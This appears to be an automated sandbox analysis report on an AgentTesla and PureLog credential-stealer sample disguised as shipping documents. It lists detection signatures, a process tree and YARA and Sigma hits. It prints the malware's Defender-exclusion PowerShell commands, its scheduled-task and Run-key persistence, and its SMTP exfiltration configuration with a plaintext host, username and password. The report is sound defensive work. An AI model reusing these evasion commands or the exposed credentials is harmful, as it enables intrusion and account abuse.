Edit tour

Windows Analysis Report
Shipping Docs.rdf.exe

Overview

General Information

Sample name:	Shipping Docs.rdf.exe
Analysis ID:	1437208
MD5:	f2bcf5a8f702dfe1879495f5428d2c2a
SHA1:	47ce34d0266e5d0b2a884d1e53ee8099124eb3d7
SHA256:	d7f670f5225888ddb631d26ccdb01a8c514965d48e15f3913348db8949b606fc
Tags:	AgentTeslaexe
Infos:

Detection

AgentTesla, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Yara detected AgentTesla

Yara detected AntiVM3

Yara detected PureLog Stealer

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

Contains functionality to log keystrokes (.Net Source)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Suspicious powershell command line found

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries disk information (often used to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses SMTP (mail sending)

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Shipping Docs.rdf.exe (PID: 1664 cmdline: "C:\Users\user\Desktop\Shipping Docs.rdf.exe" MD5: F2BCF5A8F702DFE1879495F5428D2C2A)

powershell.exe (PID: 6480 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipping Docs.rdf.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5720 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SVcPIbJno.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7476 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 5844 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SVcPIbJno" /XML "C:\Users\user\AppData\Local\Temp\tmpF63B.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 6464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 7268 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

svchost.exe (PID: 7216 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

SVcPIbJno.exe (PID: 7428 cmdline: C:\Users\user\AppData\Roaming\SVcPIbJno.exe MD5: F2BCF5A8F702DFE1879495F5428D2C2A)

schtasks.exe (PID: 7584 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SVcPIbJno" /XML "C:\Users\user\AppData\Local\Temp\tmp59D.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 7636 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

boqXv.exe (PID: 7584 cmdline: "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

conhost.exe (PID: 7344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

boqXv.exe (PID: 3216 cmdline: "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

conhost.exe (PID: 7396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://asec.ahnlab.com/ko/29133/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.parsdarou.ir", "Username": "secretariat@parsdarou.ir", "Password": "wvnz2aV[mpkyjlSut-rciofxq8sdhg"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000000E.00000002.2448473771.00000000030FC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1231304575.0000000005A00000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000E.00000002.2448473771.00000000030D2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000002.1245608119.0000000002F12000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000002.1241904701.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.1241904701.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1229585940.000000000423B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1229585940.000000000423B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1227838638.00000000032B2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000A.00000002.1282453180.0000000003C7D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.1282453180.0000000003C7D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000002.1245608119.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.1245608119.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000E.00000002.2448473771.000000000306C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.2448473771.000000000306C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1227838638.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: Shipping Docs.rdf.exe PID: 1664	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Shipping Docs.rdf.exe PID: 1664	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Shipping Docs.rdf.exe PID: 1664	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: RegSvcs.exe PID: 7268	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 7268	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: SVcPIbJno.exe PID: 7428	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SVcPIbJno.exe PID: 7428	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: SVcPIbJno.exe PID: 7428	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: RegSvcs.exe PID: 7636	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 7636	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 21 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Shipping Docs.rdf.exe.5a00000.10.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Shipping Docs.rdf.exe.5a00000.10.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Shipping Docs.rdf.exe.2fac5ec.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Shipping Docs.rdf.exe.332b878.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Shipping Docs.rdf.exe.332a860.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.2.SVcPIbJno.exe.3cb8150.8.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.SVcPIbJno.exe.3cb8150.8.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
10.2.SVcPIbJno.exe.3cb8150.8.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x31d10:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x31d82:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x31e0c:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x31e9e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x31f08:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x31f7a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x32010:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x320a0:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Shipping Docs.rdf.exe.42768e0.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Shipping Docs.rdf.exe.42768e0.7.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Shipping Docs.rdf.exe.42768e0.7.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x31d10:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x31d82:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x31e0c:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x31e9e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x31f08:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x31f7a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x32010:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x320a0:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Shipping Docs.rdf.exe.423b8c0.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Shipping Docs.rdf.exe.423b8c0.5.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Shipping Docs.rdf.exe.423b8c0.5.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x31d10:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x31d82:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x31e0c:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x31e9e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x31f08:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x31f7a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x32010:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x320a0:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
10.2.SVcPIbJno.exe.3c7d130.10.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.SVcPIbJno.exe.3c7d130.10.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
10.2.SVcPIbJno.exe.3c7d130.10.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x31d10:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x31d82:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x31e0c:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x31e9e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x31f08:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x31f7a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x32010:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x320a0:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Shipping Docs.rdf.exe.32f0450.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.RegSvcs.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33b10:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33b82:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33c0c:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33c9e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33d08:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33d7a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33e10:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33ea0:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Shipping Docs.rdf.exe.2fac5ec.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.2.SVcPIbJno.exe.3cb8150.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.SVcPIbJno.exe.3cb8150.8.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
10.2.SVcPIbJno.exe.3cb8150.8.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33b10:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6e930:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33b82:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6e9a2:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33c0c:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6ea2c:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33c9e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6eabe:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33d08:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6eb28:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33d7a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6eb9a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33e10:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6ec30:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33ea0:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x6ecc0:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
10.2.SVcPIbJno.exe.3c7d130.10.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.SVcPIbJno.exe.3c7d130.10.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
10.2.SVcPIbJno.exe.3c7d130.10.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33b10:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6eb30:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0xa9950:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33b82:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6eba2:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0xa99c2:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33c0c:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6ec2c:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0xa9a4c:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33c9e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6ecbe:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0xa9ade:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33d08:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6ed28:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0xa9b48:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33d7a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6ed9a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0xa9bba:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33e10:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6ee30:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0xa9c50:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
0.2.Shipping Docs.rdf.exe.42768e0.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Shipping Docs.rdf.exe.42768e0.7.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Shipping Docs.rdf.exe.42768e0.7.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Shipping Docs.rdf.exe.42768e0.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33b10:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6e930:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33b82:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6e9a2:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33c0c:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6ea2c:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33c9e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6eabe:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33d08:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6eb28:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33d7a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6eb9a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33e10:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6ec30:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33ea0:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x6ecc0:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Shipping Docs.rdf.exe.423b8c0.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Shipping Docs.rdf.exe.423b8c0.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Shipping Docs.rdf.exe.423b8c0.5.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Shipping Docs.rdf.exe.423b8c0.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33b10:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6eb30:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0xa9950:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33b82:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6eba2:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0xa99c2:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33c0c:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6ec2c:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0xa9a4c:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33c9e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6ecbe:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0xa9ade:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33d08:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6ed28:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0xa9b48:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33d7a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6ed9a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0xa9bba:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33e10:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6ee30:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0xa9c50:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
Click to see the 31 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipping Docs.rdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipping Docs.rdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipping Docs.rdf.exe", ParentImage: C:\Users\user\Desktop\Shipping Docs.rdf.exe, ParentProcessId: 1664, ParentProcessName: Shipping Docs.rdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipping Docs.rdf.exe", ProcessId: 6480, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 7268, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\boqXv

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SVcPIbJno" /XML "C:\Users\user\AppData\Local\Temp\tmp59D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SVcPIbJno" /XML "C:\Users\user\AppData\Local\Temp\tmp59D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\SVcPIbJno.exe, ParentImage: C:\Users\user\AppData\Roaming\SVcPIbJno.exe, ParentProcessId: 7428, ParentProcessName: SVcPIbJno.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SVcPIbJno" /XML "C:\Users\user\AppData\Local\Temp\tmp59D.tmp", ProcessId: 7584, ProcessName: schtasks.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 5.144.130.49, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 7268, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49704

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SVcPIbJno" /XML "C:\Users\user\AppData\Local\Temp\tmpF63B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SVcPIbJno" /XML "C:\Users\user\AppData\Local\Temp\tmpF63B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipping Docs.rdf.exe", ParentImage: C:\Users\user\Desktop\Shipping Docs.rdf.exe, ParentProcessId: 1664, ParentProcessName: Shipping Docs.rdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SVcPIbJno" /XML "C:\Users\user\AppData\Local\Temp\tmpF63B.tmp", ProcessId: 5844, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

